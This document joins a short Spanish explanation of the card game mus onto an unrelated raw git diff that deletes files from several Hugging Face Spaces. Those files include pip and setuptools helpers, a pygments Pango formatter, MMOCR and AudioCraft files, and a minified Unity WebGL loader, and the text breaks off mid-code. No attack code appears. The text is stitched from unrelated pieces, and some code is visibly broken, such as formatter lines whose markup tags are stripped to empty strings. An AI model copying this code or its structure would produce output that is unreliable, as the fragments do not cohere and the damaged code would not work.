      El mus se juega por parejas, que se sientan frente a frente. El repartidor o mano reparte cuatro cartas a cada jugador y luego se inicia la ronda o lance. En cada lance hay cuatro tipos de juego: grande, chica, pares y juego. En cada juego, los jugadores pueden pasar, apostar o envidar. El que gana cada juego se lleva tantos puntos como apuestas haya habido. El juego termina cuando una de las parejas alcanza los 40 puntos.

      - -

      El mus es un juego que requiere de habilidad, memoria, cálculo y sobre todo, de engaño y farol. Los jugadores deben intentar ocultar sus cartas y hacer creer al contrario que tienen mejores o peores cartas de las que realmente tienen. Para ello, se utilizan señas o gestos discretos que se hacen con la cara, las manos o los pies. Estas señas son parte del encanto y la diversión del juego, pero también pueden ser motivo de discusión y controversia.

      -

      El mus es un juego que admite muchas variantes y reglas locales. Algunas de las más conocidas son el mus a 8 reyes, el mus a 4 reyes, el mus francés, el mus argentino o el mus chileno. Cada una de estas variantes tiene sus propias particularidades y normas que las hacen más o menos complejas o interesantes. Lo importante es que los jugadores se pongan de acuerdo antes de empezar a jugar y respeten las reglas establecidas.

      -

      El mus es un juego que no solo sirve para pasar el rato, sino que también tiene beneficios para la salud mental y social. El mus estimula la memoria, la concentración, el razonamiento y la toma de decisiones. Además, favorece la interacción, la comunicación, el compañerismo y el buen humor entre los jugadores. Por eso, el mus es un juego que se recomienda practicar con frecuencia y en buena compañía.

      7b8c122e87
      -
      -
      \ No newline at end of file diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py deleted file mode 100644 index 24d6a5dd31fe33b03f90ed0f9ee465253686900c..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""For modules related to installing packages. -""" diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py deleted file mode 100644 index bd00866b8b95a98edc8956608e895a6329a944a0..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py +++ /dev/null @@ -1,83 +0,0 @@ -""" - pygments.formatters.pangomarkup - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - Formatter for Pango markup output. - - :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pip._vendor.pygments.formatter import Formatter - - -__all__ = ['PangoMarkupFormatter'] - - -_escape_table = { - ord('&'): '&', - ord('<'): '<', -} - - -def escape_special_chars(text, table=_escape_table): - """Escape & and < for Pango Markup.""" - return text.translate(table) - - -class PangoMarkupFormatter(Formatter): - """ - Format tokens as Pango Markup code. It can then be rendered to an SVG. - - .. versionadded:: 2.9 - """ - - name = 'Pango Markup' - aliases = ['pango', 'pangomarkup'] - filenames = [] - - def __init__(self, **options): - Formatter.__init__(self, **options) - - self.styles = {} - - for token, style in self.style: - start = '' - end = '' - if style['color']: - start += '' % style['color'] - end = '' + end - if style['bold']: - start += '' - end = '' + end - if style['italic']: - start += '' - end = '' + end - if style['underline']: - start += '' - end = '' + end - self.styles[token] = (start, end) - - def format_unencoded(self, tokensource, outfile): - lastval = '' - lasttype = None - - outfile.write('') - - for ttype, value in tokensource: - while ttype not in self.styles: - ttype = ttype.parent - if ttype == lasttype: - lastval += escape_special_chars(value) - else: - if lastval: - stylebegin, styleend = self.styles[lasttype] - outfile.write(stylebegin + lastval + styleend) - lastval = escape_special_chars(value) - lasttype = ttype - - if lastval: - stylebegin, styleend = self.styles[lasttype] - outfile.write(stylebegin + lastval + styleend) - - outfile.write('') diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py deleted file mode 100644 index acd20148c7e6f8a81fbf1dfdea0feadf6bc6160f..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py +++ /dev/null @@ -1,107 +0,0 @@ -"""distutils.spawn - -Provides the 'spawn()' function, a front-end to various platform- -specific functions for launching another program in a sub-process. -Also provides the 'find_executable()' to search the path for a given -executable name. -""" - -import sys -import os -import subprocess - -from distutils.errors import DistutilsExecError -from distutils.debug import DEBUG -from distutils import log - - -def spawn(cmd, search_path=1, verbose=0, dry_run=0, env=None): - """Run another program, specified as a command list 'cmd', in a new process. - - 'cmd' is just the argument list for the new process, ie. - cmd[0] is the program to run and cmd[1:] are the rest of its arguments. - There is no way to run a program with a name different from that of its - executable. - - If 'search_path' is true (the default), the system's executable - search path will be used to find the program; otherwise, cmd[0] - must be the exact path to the executable. If 'dry_run' is true, - the command will not actually be run. - - Raise DistutilsExecError if running the program fails in any way; just - return on success. - """ - # cmd is documented as a list, but just in case some code passes a tuple - # in, protect our %-formatting code against horrible death - cmd = list(cmd) - - log.info(subprocess.list2cmdline(cmd)) - if dry_run: - return - - if search_path: - executable = find_executable(cmd[0]) - if executable is not None: - cmd[0] = executable - - env = env if env is not None else dict(os.environ) - - if sys.platform == 'darwin': - from distutils.util import MACOSX_VERSION_VAR, get_macosx_target_ver - - macosx_target_ver = get_macosx_target_ver() - if macosx_target_ver: - env[MACOSX_VERSION_VAR] = macosx_target_ver - - try: - proc = subprocess.Popen(cmd, env=env) - proc.wait() - exitcode = proc.returncode - except OSError as exc: - if not DEBUG: - cmd = cmd[0] - raise DistutilsExecError("command %r failed: %s" % (cmd, exc.args[-1])) from exc - - if exitcode: - if not DEBUG: - cmd = cmd[0] - raise DistutilsExecError( - "command %r failed with exit code %s" % (cmd, exitcode) - ) - - -def find_executable(executable, path=None): - """Tries to find 'executable' in the directories listed in 'path'. - - A string listing directories separated by 'os.pathsep'; defaults to - os.environ['PATH']. Returns the complete filename or None if not found. - """ - _, ext = os.path.splitext(executable) - if (sys.platform == 'win32') and (ext != '.exe'): - executable = executable + '.exe' - - if os.path.isfile(executable): - return executable - - if path is None: - path = os.environ.get('PATH', None) - if path is None: - try: - path = os.confstr("CS_PATH") - except (AttributeError, ValueError): - # os.confstr() or CS_PATH is not available - path = os.defpath - # bpo-35755: Don't use os.defpath if the PATH environment variable is - # set to an empty string - - # PATH='' doesn't match, whereas PATH=':' looks in the current directory - if not path: - return None - - paths = path.split(os.pathsep) - for p in paths: - f = os.path.join(p, executable) - if os.path.isfile(f): - # the file exists, we have a shot at spawn working - return f - return None diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py deleted file mode 100644 index 87062b8187fa4f74a8c4edbaa60bd9a8b2d506a4..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py +++ /dev/null @@ -1,167 +0,0 @@ -""" -Filename globbing utility. Mostly a copy of `glob` from Python 3.5. - -Changes include: - * `yield from` and PEP3102 `*` removed. - * Hidden files are not ignored. -""" - -import os -import re -import fnmatch - -__all__ = ["glob", "iglob", "escape"] - - -def glob(pathname, recursive=False): - """Return a list of paths matching a pathname pattern. - - The pattern may contain simple shell-style wildcards a la - fnmatch. However, unlike fnmatch, filenames starting with a - dot are special cases that are not matched by '*' and '?' - patterns. - - If recursive is true, the pattern '**' will match any files and - zero or more directories and subdirectories. - """ - return list(iglob(pathname, recursive=recursive)) - - -def iglob(pathname, recursive=False): - """Return an iterator which yields the paths matching a pathname pattern. - - The pattern may contain simple shell-style wildcards a la - fnmatch. However, unlike fnmatch, filenames starting with a - dot are special cases that are not matched by '*' and '?' - patterns. - - If recursive is true, the pattern '**' will match any files and - zero or more directories and subdirectories. - """ - it = _iglob(pathname, recursive) - if recursive and _isrecursive(pathname): - s = next(it) # skip empty string - assert not s - return it - - -def _iglob(pathname, recursive): - dirname, basename = os.path.split(pathname) - glob_in_dir = glob2 if recursive and _isrecursive(basename) else glob1 - - if not has_magic(pathname): - if basename: - if os.path.lexists(pathname): - yield pathname - else: - # Patterns ending with a slash should match only directories - if os.path.isdir(dirname): - yield pathname - return - - if not dirname: - yield from glob_in_dir(dirname, basename) - return - # `os.path.split()` returns the argument itself as a dirname if it is a - # drive or UNC path. Prevent an infinite recursion if a drive or UNC path - # contains magic characters (i.e. r'\\?\C:'). - if dirname != pathname and has_magic(dirname): - dirs = _iglob(dirname, recursive) - else: - dirs = [dirname] - if not has_magic(basename): - glob_in_dir = glob0 - for dirname in dirs: - for name in glob_in_dir(dirname, basename): - yield os.path.join(dirname, name) - - -# These 2 helper functions non-recursively glob inside a literal directory. -# They return a list of basenames. `glob1` accepts a pattern while `glob0` -# takes a literal basename (so it only has to check for its existence). - - -def glob1(dirname, pattern): - if not dirname: - if isinstance(pattern, bytes): - dirname = os.curdir.encode('ASCII') - else: - dirname = os.curdir - try: - names = os.listdir(dirname) - except OSError: - return [] - return fnmatch.filter(names, pattern) - - -def glob0(dirname, basename): - if not basename: - # `os.path.split()` returns an empty basename for paths ending with a - # directory separator. 'q*x/' should match only directories. - if os.path.isdir(dirname): - return [basename] - else: - if os.path.lexists(os.path.join(dirname, basename)): - return [basename] - return [] - - -# This helper function recursively yields relative pathnames inside a literal -# directory. - - -def glob2(dirname, pattern): - assert _isrecursive(pattern) - yield pattern[:0] - for x in _rlistdir(dirname): - yield x - - -# Recursively yields relative pathnames inside a literal directory. -def _rlistdir(dirname): - if not dirname: - if isinstance(dirname, bytes): - dirname = os.curdir.encode('ASCII') - else: - dirname = os.curdir - try: - names = os.listdir(dirname) - except os.error: - return - for x in names: - yield x - path = os.path.join(dirname, x) if dirname else x - for y in _rlistdir(path): - yield os.path.join(x, y) - - -magic_check = re.compile('([*?[])') -magic_check_bytes = re.compile(b'([*?[])') - - -def has_magic(s): - if isinstance(s, bytes): - match = magic_check_bytes.search(s) - else: - match = magic_check.search(s) - return match is not None - - -def _isrecursive(pattern): - if isinstance(pattern, bytes): - return pattern == b'**' - else: - return pattern == '**' - - -def escape(pathname): - """Escape all special characters. - """ - # Escaping is done by wrapping any of "*?[" between square brackets. - # Metacharacters do not work in the drive part and shouldn't be escaped. - drive, pathname = os.path.splitdrive(pathname) - if isinstance(pathname, bytes): - pathname = magic_check_bytes.sub(br'[\1]', pathname) - else: - pathname = magic_check.sub(r'[\1]', pathname) - return drive + pathname diff --git a/spaces/tomofi/MMOCR/mmocr/version.py b/spaces/tomofi/MMOCR/mmocr/version.py deleted file mode 100644 index 6697c2f4d34b42fb7af44990757f6cca7f75abe0..0000000000000000000000000000000000000000 --- a/spaces/tomofi/MMOCR/mmocr/version.py +++ /dev/null @@ -1,4 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. - -__version__ = '0.4.1' -short_version = __version__ diff --git a/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py b/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py deleted file mode 100644 index 117b2b1e496ca31b3d614672b472c9213cedb4ad..0000000000000000000000000000000000000000 --- a/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid shows how to train a base causal EnCodec model at 24 kHz. -""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=8, partition=partitions) - # base causal EnCodec trained on monophonic audio sampled at 24 kHz - launcher.bind_(solver='compression/encodec_base_24khz') - # replace this by the desired dataset - launcher.bind_(dset='audio/example') - # launch xp - launcher() diff --git a/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js b/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js deleted file mode 100644 index 7205575e8b86ff38f6022e337aec1f34ec4f1b8b..0000000000000000000000000000000000000000 --- a/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js +++ /dev/null @@ -1,2 +0,0 @@ -function createUnityInstance(e,t,r){function n(e,r){if(!n.aborted&&t.showBanner)return"error"==r&&(n.aborted=!0),t.showBanner(e,r);switch(r){case"error":console.error(e);break;case"warning":console.warn(e);break;default:console.log(e)}}function o(e){var t=e.reason||e.error,r=t?t.toString():e.message||e.reason||"",n=t&&t.stack?t.stack.toString():"";if(n.startsWith(r)&&(n=n.substring(r.length)),r+="\n"+n.trim(),r&&f.stackTraceRegExp&&f.stackTraceRegExp.test(r)){var o=e.filename||t&&(t.fileName||t.sourceURL)||"",a=e.lineno||t&&(t.lineNumber||t.line)||0;i(r,o,a)}}function a(e){e.preventDefault()}function i(e,t,r){if(e.indexOf("fullscreen error")==-1){if(f.startupErrorHandler)return void f.startupErrorHandler(e,t,r);if(!(f.errorHandler&&f.errorHandler(e,t,r)||(console.log("Invoking error handler due to\n"+e),"function"==typeof dump&&dump("Invoking error handler due to\n"+e),i.didShowErrorMessage))){var e="An error occurred running the Unity content on this page. See your browser JavaScript console for more info. The error was:\n"+e;e.indexOf("DISABLE_EXCEPTION_CATCHING")!=-1?e="An exception has occurred, but exception handling has been disabled in this build. If you are the developer of this content, enable exceptions in your project WebGL player settings to be able to catch the exception or see the stack trace.":e.indexOf("Cannot enlarge memory arrays")!=-1?e="Out of memory. If you are the developer of this content, try allocating more memory to your WebGL build in the WebGL player settings.":e.indexOf("Invalid array buffer length")==-1&&e.indexOf("Invalid typed array length")==-1&&e.indexOf("out of memory")==-1&&e.indexOf("could not allocate memory")==-1||(e="The browser could not allocate enough memory for the WebGL content. If you are the developer of this content, try allocating less memory to your WebGL build in the WebGL player settings."),alert(e),i.didShowErrorMessage=!0}}}function s(e,t){if("symbolsUrl"!=e){var n=f.downloadProgress[e];n||(n=f.downloadProgress[e]={started:!1,finished:!1,lengthComputable:!1,total:0,loaded:0}),"object"!=typeof t||"progress"!=t.type&&"load"!=t.type||(n.started||(n.started=!0,n.lengthComputable=t.lengthComputable),n.total=t.total,n.loaded=t.loaded,"load"==t.type&&(n.finished=!0));var o=0,a=0,i=0,s=0,l=0;for(var e in f.downloadProgress){var n=f.downloadProgress[e];if(!n.started)return 0;i++,n.lengthComputable?(o+=n.loaded,a+=n.total,s++):n.finished||l++}var d=i?(i-l-(a?s*(a-o)/a:0))/i:0;r(.9*d)}}function l(e,t){return new Promise(function(r,n){try{for(var o in w)if(w[o].hasUnityMarker(e)){t&&console.log('You can reduce startup time if you configure your web server to add "Content-Encoding: '+o+'" response header when serving "'+t+'" file.');var a=w[o];if(!a.worker){var i=URL.createObjectURL(new Blob(["this.require = ",a.require.toString(),"; this.decompress = ",a.decompress.toString(),"; this.onmessage = ",function(e){var t={id:e.data.id,decompressed:this.decompress(e.data.compressed)};postMessage(t,t.decompressed?[t.decompressed.buffer]:[])}.toString(),"; postMessage({ ready: true });"],{type:"application/javascript"}));a.worker=new Worker(i),a.worker.onmessage=function(e){return e.data.ready?void URL.revokeObjectURL(i):(this.callbacks[e.data.id](e.data.decompressed),void delete this.callbacks[e.data.id])},a.worker.callbacks={},a.worker.nextCallbackId=0}var s=a.worker.nextCallbackId++;return a.worker.callbacks[s]=r,void a.worker.postMessage({id:s,compressed:e},[e.buffer])}r(e)}catch(e){n(e)}})}function d(e){s(e);var t=f.cacheControl(f[e]),r=f.companyName&&f.productName?f.cachedFetch:f.fetchWithProgress,o=f[e],a=/file:\/\//.exec(o)?"same-origin":void 0,i=r(f[e],{method:"GET",companyName:f.companyName,productName:f.productName,control:t,mode:a,onProgress:function(t){s(e,t)}});return i.then(function(t){return l(t.parsedBody,f[e])}).catch(function(t){var r="Failed to download file "+f[e];"file:"==location.protocol?n(r+". Loading web pages via a file:// URL without a web server is not supported by this browser. Please use a local development web server to host Unity content, or use the Unity Build and Run option.","error"):console.error(r)})}function u(){return d("frameworkUrl").then(function(e){var t=URL.createObjectURL(new Blob([e],{type:"application/javascript"}));return new Promise(function(e,r){var o=document.createElement("script");o.src=t,o.onload=function(){if("undefined"==typeof unityFramework||!unityFramework){var r=[["br","br"],["gz","gzip"]];for(var a in r){var i=r[a];if(f.frameworkUrl.endsWith("."+i[0])){var s="Unable to parse "+f.frameworkUrl+"!";if("file:"==location.protocol)return void n(s+" Loading pre-compressed (brotli or gzip) content via a file:// URL without a web server is not supported by this browser. Please use a local development web server to host compressed Unity content, or use the Unity Build and Run option.","error");if(s+=' This can happen if build compression was enabled but web server hosting the content was misconfigured to not serve the file with HTTP Response Header "Content-Encoding: '+i[1]+'" present. Check browser Console and Devtools Network tab to debug.',"br"==i[0]&&"http:"==location.protocol){var l=["localhost","127.0.0.1"].indexOf(location.hostname)!=-1?"":"Migrate your server to use HTTPS.";s=/Firefox/.test(navigator.userAgent)?"Unable to parse "+f.frameworkUrl+'!
      If using custom web server, verify that web server is sending .br files with HTTP Response Header "Content-Encoding: br". Brotli compression may not be supported in Firefox over HTTP connections. '+l+' See https://bugzilla.mozilla.org/show_bug.cgi?id=1670675 for more information.':"Unable to parse "+f.frameworkUrl+'!
      If using custom web server, verify that web server is sending .br files with HTTP Response Header "Content-Encoding: br". Brotli compression may not be supported over HTTP connections. Migrate your server to use HTTPS.'}return void n(s,"error")}}n("Unable to parse "+f.frameworkUrl+"! The file is corrupt, or compression was misconfigured? (check Content-Encoding HTTP Response Header on web server)","error")}var d=unityFramework;unityFramework=null,o.onload=null,URL.revokeObjectURL(t),e(d)},o.onerror=function(e){n("Unable to load file "+f.frameworkUrl+"! Check that the file exists on the remote server. (also check browser Console and Devtools Network tab to debug)","error")},document.body.appendChild(o),f.deinitializers.push(function(){document.body.removeChild(o)})})})}function c(){Promise.all([u(),d("codeUrl")]).then(function(e){f.wasmBinary=e[1],e[0](f)});var e=d("dataUrl");f.preRun.push(function(){f.addRunDependency("dataUrl"),e.then(function(e){var t=new DataView(e.buffer,e.byteOffset,e.byteLength),r=0,n="UnityWebData1.0\0";if(!String.fromCharCode.apply(null,e.subarray(r,r+n.length))==n)throw"unknown data format";r+=n.length;var o=t.getUint32(r,!0);for(r+=4;r0;d=u,u=l.indexOf("/",d)+1)f.FS_createPath(l.substring(0,d),l.substring(d,u-1),!0,!0);f.FS_createDataFile(l,null,e.subarray(a,a+i),!0,!0,!0)}f.removeRunDependency("dataUrl")})})}r=r||function(){};var f={canvas:e,webglContextAttributes:{preserveDrawingBuffer:!1},cacheControl:function(e){return e==f.dataUrl?"must-revalidate":"no-store"},streamingAssetsUrl:"StreamingAssets",downloadProgress:{},deinitializers:[],intervals:{},setInterval:function(e,t){var r=window.setInterval(e,t);return this.intervals[r]=!0,r},clearInterval:function(e){delete this.intervals[e],window.clearInterval(e)},preRun:[],postRun:[],print:function(e){console.log(e)},printErr:function(e){console.error(e),"string"==typeof e&&e.indexOf("wasm streaming compile failed")!=-1&&(e.toLowerCase().indexOf("mime")!=-1?n('HTTP Response Header "Content-Type" configured incorrectly on the server for file '+f.codeUrl+' , should be "application/wasm". Startup time performance will suffer.',"warning"):n('WebAssembly streaming compilation failed! This can happen for example if "Content-Encoding" HTTP header is incorrectly enabled on the server for file '+f.codeUrl+", but the file is not pre-compressed on disk (or vice versa). Check the Network tab in browser Devtools to debug server header configuration.","warning"))},locateFile:function(e){return e},disabledCanvasEvents:["contextmenu","dragstart"]};for(var h in t)f[h]=t[h];f.streamingAssetsUrl=new URL(f.streamingAssetsUrl,document.URL).href;var b=f.disabledCanvasEvents.slice();b.forEach(function(t){e.addEventListener(t,a)}),window.addEventListener("error",o),window.addEventListener("unhandledrejection",o),f.deinitializers.push(function(){f.disableAccessToMediaDevices(),b.forEach(function(t){e.removeEventListener(t,a)}),window.removeEventListener("error",o),window.removeEventListener("unhandledrejection",o);for(var t in f.intervals)window.clearInterval(t);f.intervals={}}),f.QuitCleanup=function(){for(var e=0;e=200&&this.status<=299}.bind(this)})}function o(e,t,r,n,o){var a={url:e,version:l.version,company:t,product:r,updated:n,revalidated:n,accessed:n,response:{headers:{}}};return o&&(o.headers.forEach(function(e,t){a.response.headers[t]=e}),["redirected","status","statusText","type","url"].forEach(function(e){a.response[e]=o[e]}),a.response.parsedBody=o.parsedBody),a}function a(e,t){return(!t||!t.method||"GET"===t.method)&&((!t||["must-revalidate","immutable"].indexOf(t.control)!=-1)&&!!e.match("^https?://"))}function i(i,u){function c(t,r){return d(t,r).then(function(t){return!m.enabled||m.revalidated?t:304===t.status?(m.result.revalidated=m.result.accessed,m.revalidated=!0,h.storeRequest(m.result).then(function(){e("'"+m.result.url+"' successfully revalidated and served from the indexedDB cache")}).catch(function(t){e("'"+m.result.url+"' successfully revalidated but not stored in the indexedDB cache due to the error: "+t)}),new n(m.result.response)):(200==t.status?(m.result=o(t.url,m.company,m.product,m.accessed,t),m.revalidated=!0,h.storeRequest(m.result).then(function(){e("'"+m.result.url+"' successfully downloaded and stored in the indexedDB cache")}).catch(function(t){e("'"+m.result.url+"' successfully downloaded but not stored in the indexedDB cache due to the error: "+t)})):e("'"+m.result.url+"' request failed with status: "+t.status+" "+t.statusText),t)})}function f(e){u&&u.onProgress&&(u.onProgress({type:"progress",total:e.parsedBody.length,loaded:e.parsedBody.length,lengthComputable:!0}),u.onProgress({type:"load",total:e.parsedBody.length,loaded:e.parsedBody.length,lengthComputable:!0}))}var h=s.getInstance(),b=t("string"==typeof i?i:i.url),m={enabled:a(b,u)};return u&&(m.control=u.control,m.company=u.company,m.product=u.product),m.result=o(b,m.company,m.product,Date.now()),m.revalidated=!1,m.enabled?h.loadRequest(m.result.url).then(function(t){if(!t||t.version!==l.version)return c(i,u);m.result=t,m.result.accessed=Date.now();var o=new n(m.result.response);if("immutable"==m.control)return m.revalidated=!0,h.storeRequest(m.result),e("'"+m.result.url+"' served from the indexedDB cache without revalidation"),f(o),o;if(r(m.result.url)&&(o.headers.get("Last-Modified")||o.headers.get("ETag")))return fetch(m.result.url,{method:"HEAD"}).then(function(t){return m.revalidated=["Last-Modified","ETag"].every(function(e){return!o.headers.get(e)||o.headers.get(e)==t.headers.get(e)}),m.revalidated?(m.result.revalidated=m.result.accessed,h.storeRequest(m.result),e("'"+m.result.url+"' successfully revalidated and served from the indexedDB cache"),f(o),o):c(i,u)});u=u||{};var a=u.headers||{};return u.headers=a,o.headers.get("Last-Modified")?(a["If-Modified-Since"]=o.headers.get("Last-Modified"),a["Cache-Control"]="no-cache"):o.headers.get("ETag")&&(a["If-None-Match"]=o.headers.get("ETag"),a["Cache-Control"]="no-cache"),c(i,u)}).catch(function(t){return e("Failed to load '"+m.result.url+"' from indexedDB cache due to the error: "+t),d(i,u)}):d(i,u)}var s=f.UnityCache,l=s.RequestStore,d=f.fetchWithProgress;return n.prototype.arrayBuffer=function(){return Promise.resolve(this.parsedBody.buffer)},n.prototype.blob=function(){return this.arrayBuffer().then(function(e){return new Blob([e])})},n.prototype.json=function(){return this.text().then(function(e){return JSON.parse(e)})},n.prototype.text=function(){var e=new TextDecoder;return Promise.resolve(e.decode(this.parsedBody))},i}();var w={gzip:{require:function(e){var t={"inflate.js":function(e,t,r){"use strict";function n(e){if(!(this instanceof n))return new n(e);this.options=s.assign({chunkSize:16384,windowBits:0,to:""},e||{});var t=this.options;t.raw&&t.windowBits>=0&&t.windowBits<16&&(t.windowBits=-t.windowBits,0===t.windowBits&&(t.windowBits=-15)),!(t.windowBits>=0&&t.windowBits<16)||e&&e.windowBits||(t.windowBits+=32),t.windowBits>15&&t.windowBits<48&&0===(15&t.windowBits)&&(t.windowBits|=15),this.err=0,this.msg="",this.ended=!1,this.chunks=[],this.strm=new c,this.strm.avail_out=0;var r=i.inflateInit2(this.strm,t.windowBits);if(r!==d.Z_OK)throw new Error(u[r]);this.header=new f,i.inflateGetHeader(this.strm,this.header)}function o(e,t){var r=new n(t);if(r.push(e,!0),r.err)throw r.msg||u[r.err];return r.result}function a(e,t){return t=t||{},t.raw=!0,o(e,t)}var i=e("./zlib/inflate"),s=e("./utils/common"),l=e("./utils/strings"),d=e("./zlib/constants"),u=e("./zlib/messages"),c=e("./zlib/zstream"),f=e("./zlib/gzheader"),h=Object.prototype.toString;n.prototype.push=function(e,t){var r,n,o,a,u,c,f=this.strm,b=this.options.chunkSize,m=this.options.dictionary,g=!1;if(this.ended)return!1;n=t===~~t?t:t===!0?d.Z_FINISH:d.Z_NO_FLUSH,"string"==typeof e?f.input=l.binstring2buf(e):"[object ArrayBuffer]"===h.call(e)?f.input=new Uint8Array(e):f.input=e,f.next_in=0,f.avail_in=f.input.length;do{if(0===f.avail_out&&(f.output=new s.Buf8(b),f.next_out=0,f.avail_out=b),r=i.inflate(f,d.Z_NO_FLUSH),r===d.Z_NEED_DICT&&m&&(c="string"==typeof m?l.string2buf(m):"[object ArrayBuffer]"===h.call(m)?new Uint8Array(m):m,r=i.inflateSetDictionary(this.strm,c)),r===d.Z_BUF_ERROR&&g===!0&&(r=d.Z_OK,g=!1),r!==d.Z_STREAM_END&&r!==d.Z_OK)return this.onEnd(r),this.ended=!0,!1;f.next_out&&(0!==f.avail_out&&r!==d.Z_STREAM_END&&(0!==f.avail_in||n!==d.Z_FINISH&&n!==d.Z_SYNC_FLUSH)||("string"===this.options.to?(o=l.utf8border(f.output,f.next_out),a=f.next_out-o,u=l.buf2string(f.output,o),f.next_out=a,f.avail_out=b-a,a&&s.arraySet(f.output,f.output,o,a,0),this.onData(u)):this.onData(s.shrinkBuf(f.output,f.next_out)))),0===f.avail_in&&0===f.avail_out&&(g=!0)}while((f.avail_in>0||0===f.avail_out)&&r!==d.Z_STREAM_END);return r===d.Z_STREAM_END&&(n=d.Z_FINISH),n===d.Z_FINISH?(r=i.inflateEnd(this.strm),this.onEnd(r),this.ended=!0,r===d.Z_OK):n!==d.Z_SYNC_FLUSH||(this.onEnd(d.Z_OK),f.avail_out=0,!0)},n.prototype.onData=function(e){this.chunks.push(e)},n.prototype.onEnd=function(e){e===d.Z_OK&&("string"===this.options.to?this.result=this.chunks.join(""):this.result=s.flattenChunks(this.chunks)),this.chunks=[],this.err=e,this.msg=this.strm.msg},r.Inflate=n,r.inflate=o,r.inflateRaw=a,r.ungzip=o},"utils/common.js":function(e,t,r){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;r.assign=function(e){for(var t=Array.prototype.slice.call(arguments,1);t.length;){var r=t.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var n in r)r.hasOwnProperty(n)&&(e[n]=r[n])}}return e},r.shrinkBuf=function(e,t){return e.length===t?e:e.subarray?e.subarray(0,t):(e.length=t,e)};var o={arraySet:function(e,t,r,n,o){if(t.subarray&&e.subarray)return void e.set(t.subarray(r,r+n),o);for(var a=0;a=252?6:l>=248?5:l>=240?4:l>=224?3:l>=192?2:1;s[254]=s[254]=1,r.string2buf=function(e){var t,r,n,a,i,s=e.length,l=0;for(a=0;a>>6,t[i++]=128|63&r):r<65536?(t[i++]=224|r>>>12,t[i++]=128|r>>>6&63,t[i++]=128|63&r):(t[i++]=240|r>>>18,t[i++]=128|r>>>12&63,t[i++]=128|r>>>6&63,t[i++]=128|63&r);return t},r.buf2binstring=function(e){return n(e,e.length)},r.binstring2buf=function(e){for(var t=new o.Buf8(e.length),r=0,n=t.length;r4)d[o++]=65533,r+=i-1;else{for(a&=2===i?31:3===i?15:7;i>1&&r1?d[o++]=65533:a<65536?d[o++]=a:(a-=65536,d[o++]=55296|a>>10&1023,d[o++]=56320|1023&a)}return n(d,o)},r.utf8border=function(e,t){var r;for(t=t||e.length,t>e.length&&(t=e.length),r=t-1;r>=0&&128===(192&e[r]);)r--;return r<0?t:0===r?t:r+s[e[r]]>t?r:t}},"zlib/inflate.js":function(e,t,r){"use strict";function n(e){return(e>>>24&255)+(e>>>8&65280)+((65280&e)<<8)+((255&e)<<24)}function o(){this.mode=0,this.last=!1,this.wrap=0,this.havedict=!1,this.flags=0,this.dmax=0,this.check=0,this.total=0,this.head=null,this.wbits=0,this.wsize=0,this.whave=0,this.wnext=0,this.window=null,this.hold=0,this.bits=0,this.length=0,this.offset=0,this.extra=0,this.lencode=null,this.distcode=null,this.lenbits=0,this.distbits=0,this.ncode=0,this.nlen=0,this.ndist=0,this.have=0,this.next=null,this.lens=new w.Buf16(320),this.work=new w.Buf16(288),this.lendyn=null,this.distdyn=null,this.sane=0,this.back=0,this.was=0}function a(e){var t;return e&&e.state?(t=e.state,e.total_in=e.total_out=t.total=0,e.msg="",t.wrap&&(e.adler=1&t.wrap),t.mode=z,t.last=0,t.havedict=0,t.dmax=32768,t.head=null,t.hold=0,t.bits=0,t.lencode=t.lendyn=new w.Buf32(me),t.distcode=t.distdyn=new w.Buf32(ge),t.sane=1,t.back=-1,T):O}function i(e){var t;return e&&e.state?(t=e.state,t.wsize=0,t.whave=0,t.wnext=0,a(e)):O}function s(e,t){var r,n;return 